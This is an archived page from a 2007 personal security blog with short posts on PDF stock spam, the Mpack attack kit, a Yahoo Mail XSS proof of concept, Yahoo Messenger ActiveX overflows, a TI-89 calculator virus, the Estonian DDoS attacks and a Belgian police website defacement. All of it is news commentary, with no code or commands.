Wednesday, June 27, 2007

PDF spam on the rise.

A large “pump-and-dump” stock spam campaign is underway, but rather than including the content of the spam in an image file, this campaign includes the spam content within a .PDF file. The stock spam is believed to be sent from Stration infected computers, as this spam campaign closely followed a new W32/Stration worm mass-mailing which contained a number of .PDF files, and Stration has been associated with pump and dump spam in the past. The current spam contains one or more .PDF files, has a randomly generated subject line and sender name, and a blank message body. The .PDF files contain images which look very similar to previous image based stock spam. Most of Belgian enterprises seems to be flooded by this new type of spam.
Please be careful before opening such type of email if it wasn't removed by your antispam solution.

comp.virus is officially dead.

comp.virus is officially dead...
Of course, in any sense comp.virus has been gone for a good long time, the group itself was slated for removal on june 25 2007... I have still messages on my pc from it - back before I even got on the internet. I have read comp.virus thanks to a fidonet gateway... oh yes, there was the fido VIRUS and VIRUS_INFO echos (in fact those still exist, though they're mostly unused nowadays).
Of course it wasn't long after I found comp.virus that it fell out of use (for reasons that Nick Fitzgerald has probably explained too many times already) and alt.comp.virus was used as a substitute (which proved interesting for all sorts of reasons)... alt.comp.virus (and the more recent alt.comp.anti-virus) are unmoderated, however, and without that control over the quality of the content most of the knowledgeable folks moved on to less noisy environments.
I'm feeling old now .. the removal of comp.virus is like going back to your old neighborhood and discovering that your favourite spot has been broken down and replaced by a large supermarket.

Monday, June 25, 2007

Cabir mobile virus author arrested?

Saturday Spanish police has arrested a 28-year-old man on suspicion of creating and spreading a virus that affected over 100.000 high-end mobile phones. The man was detained in the eastern coastal city of Valencia following an investigation that lasted over seven months. It is the first time that the creator of a virus that targets mobile phones was arrested in Spain. Though no name was given, I assume it was Vallez of 29a the author of the first mobile malware, Cabir.

Friday, June 22, 2007

Belgian Federal Police website hacked!

This afternoon around 14:00 the website from the Federal Police was hacked. During several minutes you could see a message from the 'Spycheck Team'. It's the first time this happened to the Federal Belgian Police website. The page could be removed in minutes however the website seems to still have some problems and shows a message that the site is temporarely unavailable at this time of writing.
The page showed ( 'hacked by Spynet' and
continued with a French text:
"Soyez heureux, un gamin de 17 ans a piraté le site de la Police Belge.
La sécurité de votre site reflète bien le manque de compétence de la Police.
Webmaster: Allez réviser, ça vous fera du bien.
Gouvernement: Recrutez une police de meilleur niveau, celle-ci ne ressemble strictement à rien."

Wednesday, June 20, 2007

Mpack attacks and Yahoo's cross-site scripting POC.

A malware distribution and attack kit sold commercially through underground channels on the Internet has compromised hundreds of thousands of systems in the past six months, including an epidemic of infections that hit Italian Web servers this past weekend, according to security and antivirus firms. Known as Mpack, the kit consists of commercial-grade software components written in the PHP Web programming language and apparently sold by a group of Russian programmers. The software, which comes with a year of support, was first mentioned in an analysis penned by antivirus firm Panda Software. In mid-May, Panda stated that the software had compromised at least 100.000 computers. The kit uses techniques similar to previous attacks that leverage legitimate Web sites that have been compromised to redirect visitors to malicious download sites. The software uses HTTP header information to send exploits that target the victim's specific browser. The software has garnered attention this past weekend because a number of compromised Web sites in Italy have redirected visitors to malicious sites running Mpack, according to antivirus firm Trend Micro. The Mpack kit sells for around 1.000 dollars. If you've been following the media, you'll know that the majority of sites affected are in Italy. Although it hasn't caused anything like the havoc wreaked by the worm epidemics of 2004 and 2005, Italian TV went so far as to warn viewers of the danger...
And that's not all ....
A proof of concept code for a cross-site scripting (XSS) exploit involving Yahoo Mail has been discovered recently. The POC code involved in the exploit comprises of two components. The first component is a CGI script directly responsible for the exploit while the second component acts as a module that generates a URL string, which is critical in the execution of the exploit. The first component is installed on a web server. This code is supposed to execute whenever a user visits a web page that is hosted on that server. The path of the CGI script on the web server is then parsed by the second component and appends a Yahoo URL string to it. An entirely new URL is generated. This URL can be sent to an unsuspecting user through an innocent-looking email or YM message. When the user clicks on the URL, his Yahoo account becomes compromised. Fortunately this piece of POC code does nothing but display an email from the user’s inbox in a webpage that is external from Yahoo’s domain. Despite its limited functionality, the POC code has made its point that the user’s web mail account can be easily compromised by a simple click of a link.
Stupid to say that both are of course detected by your AV product.

Tuesday, June 19, 2007

NATO and the Estonian DDOS attacks.

Defense ministers at the North Atlantic Treaty Organization asked to beef up cybersecurity following last month's attacks on the Web servers and network infrastructure in Estonia.
The concerns surfaced at the annual meeting of NATO defense ministers in Brussels, Belgium -- a two-day meeting largely dedicated to the controversial topic of deploying missile defense systems in Europe. However, the recent attacks on government Web sites and systems in the northern European country of Estonia became a significant second point of discussion. The attacks began on April 28 (and I reported about it June 3 2007) , following violent clashes between the Estonian police and ethnic Russians in the country over the removal of a Red Army monument that symbolizes the defeat of Nazi Germany by the Soviet Union during World War II, but is also a reminder to Estonians of the more than four decades that the Soviets occupied the nation. While the Estonian government has accused Russia of masterminding the attacks, evidence appears to indicate that bot masters sympathetic to the ethnic Russian cause were responsible. A 19-year-old student was detained and questioned in the case, but not charged yet. It's interesting to see this evolution as I expect that there will be a change in NATO's behaviour in such cases in the future.

Tuesday, June 12, 2007

I still love my old TI calculator, without virus.

Last week anti-virus vendors received a sample of a virus written for the programmable calculator TI-89, produced by Texas Instruments. This calculator runs on the Motorola 68000 processor and has a computing power comparable to the first IBM PCs. It also offers cable connectivity to a PC and to other calculators to exchange programs. Essentially, this calculator is a small computer that runs programs. One can get a wide variety of games for it–from classic Tetris and Pacman to full-blown chess! There is little security built in so programs have full access to all other programs–just like in the time of DOS for IBM PCs. Reliable detection of this proof-of-concept virus (TIOS/Tigraa) is easy, even though it attempts to hide by obfuscating the call to the virus body within the infected file. The problem is that there is no AV software yet for calculators, so protection can only be built on a PC. This would not block propagation between calculators should a similar virus ever get into the field. Fortunately, the chances of this happening are rather slim. It's interesting to know that more and more mobile devices (pocket organizers, smartphones, Internet tablets, calculators, etc.) receive enough computing power and not enough security features to create breeding grounds for malicious code. I urge developers for all mobile devices to make the necessary investment into securing the environment and the programs they create.
I was digging up last week my 30 year old programmable TI calculator with less possibilities however I still remember my own first programs ( SkippyHopper, BioGroove, etc)on this calculator which were 'fantastic' for that time. I was only concentrating at the creation of some games at that moment. I advise the maker (Piotr Bania) of this virus to concentrate at creating more useful programs in the future.

Yahoo! I got two vulnerabilities!

Two vulnerabilities for the Yahoo! Messenger have been disclosed to the public. These vulnerabilities have been proven to result in arbitrary code execution, which means that it may just be a little time before it is exploited by malicious users. The first vulnerability is because of lack of boundary checking in the ywcupl.dll (used for Yahoo! Webcam Upload ActiveX control). This error can cause a stack based buffer overflow by assigning a very long string to the “Server” property and then calling the “Send()” method. The second vulnerability is because of lack of boundary checking in the ywcvwr.dll (used for Yahoo! Webcam Viewer ActiveX control). Not to worry though, because Yahoo! has already given an update which solves this issue. Please go to this site to know more about the vulnerability and how to update your Yahoo! Messengers.
Hmmm, time to check my own Yahoo Messenger...well I don't use it often ... but that's of course one of the problems, isn't it?

Thursday, June 07, 2007

Google and Security ... Oh no.

A lot of press coverage about Google's security plans. Something we saw the last weeks ..... 'WOW, Google is ahead in security', 'Google is planning serious security measures', 'Google will be a new security vendor' ..... Just a week after launching Google Online Security Blog to "periodically provide updates on recent trends, interesting findings, and efforts related to online security," Google acquired the security developer GreenBorder, whose software creates a sort of virtualized Web browser for safer Internet use. Both developments show Google is taking online security more seriously yes, but it's definitely not to the point that it will compete with the established security and anti-virus or malware vendors. I can say to everybody and definitely to the press: Please don't exagerate as the steps from Google into security are just very basic. So please stop making the 'noise' that Google is investing heavy in security! What a joke!

Sunday, June 03, 2007

Estonian DDos attacks and 'De Morgen'

I was interviewed by a known newspaper 'De Morgen' last friday. You can find the full article on my website at the press page. For the people who missed the news about the Russian DDos attack to Estonia I will give here a small overview. It happened about a month ago.
The trouble between the Estonian government and Estonia’s ethnic Russians has taken a new dimension in the online world.
According to Ars Technica:
Cyber-warfare on an unprecedented scale has hammered Estonian web sites for the last weeks in April in the aftermath of the government’s controversial decision to relocate a Soviet-era war monument from the center of Tallinn to the suburbs. Two days of rioting by ethnic Russians, who saw this as an attack on their heritage and on minority rights, quickly transitioned from the real to the virtual world, as government web sites came under DDoS attacks so severe that many agencies shut off access to IP addresses outside Estonia for several days.
Since it seems clear that the attacks come from Russia (some attacks coming allegedly from Russia’s president Putin office), Estonia is raising the issue with NATO. After all, when a NATO-member finds itself under attack, it is the function of NATO to get involved, considering the whole alliance under attack.

However it's not so clear as you think as this kind of attack is not yet officially recognised as an act of war. It's a gap in some international laws. In my opinion it's time to change this ASAP!